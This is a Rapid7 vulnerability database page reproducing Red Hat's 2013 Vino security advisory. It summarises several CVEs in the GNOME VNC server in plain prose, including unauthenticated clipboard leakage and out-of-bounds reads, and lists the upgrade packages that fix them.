Rapid7 Vulnerability & Exploit Database

RHSA-2013:0169: vino security update

Back to Search

RHSA-2013:0169: vino security update

Severity
5
CVSS
(AV:N/AC:H/Au:N/C:P/I:P/A:P)
Published
09/30/2012
Created
07/25/2018
Added
01/29/2013
Modified
07/04/2017

Description

Vino is a Virtual Network Computing (VNC) server for GNOME. It allowsremote users to connect to a running GNOME session using VNC.It was found that Vino transmitted all clipboard activity on the systemrunning Vino to all clients connected to port 5900, even those who had notauthenticated. A remote attacker who is able to access port 5900 on asystem running Vino could use this flaw to read clipboard data withoutauthenticating. (CVE-2012-4429)Two out-of-bounds memory read flaws were found in the way Vino processedclient framebuffer requests in certain encodings. An authenticated clientcould use these flaws to send a specially-crafted request to Vino, causingit to crash. (CVE-2011-0904, CVE-2011-0905)In certain circumstances, the vino-preferences dialog box incorrectlyindicated that Vino was only accessible from the local network. This couldconfuse a user into believing connections from external networks are notallowed (even when they are allowed). With this update, vino-preferences nolonger displays connectivity and reachable information. (CVE-2011-1164)There was no warning that Universal Plug and Play (UPnP) was used to openports on a user's network router when the "Configure network automaticallyto accept connections" option was enabled (it is disabled by default) inthe Vino preferences. This update changes the option's description to avoidthe risk of a UPnP router configuration change without the user's consent.(CVE-2011-1165)All Vino users should upgrade to this updated package, which containsbackported patches to resolve these issues. The GNOME session must berestarted (log out, then log back in) for this update to take effect.

Solution(s)

  • redhat-upgrade-vino
  • redhat-upgrade-vino-debuginfo

With Rapid7 live dashboards, I have a clear view of all the assets on my network, which ones can be exploited, and what I need to do in order to reduce the risk in my environment in real-time. No other tool gives us that kind of value and insight.

– Scott Cheney, Manager of Information Security, Sierra View Medical Center

;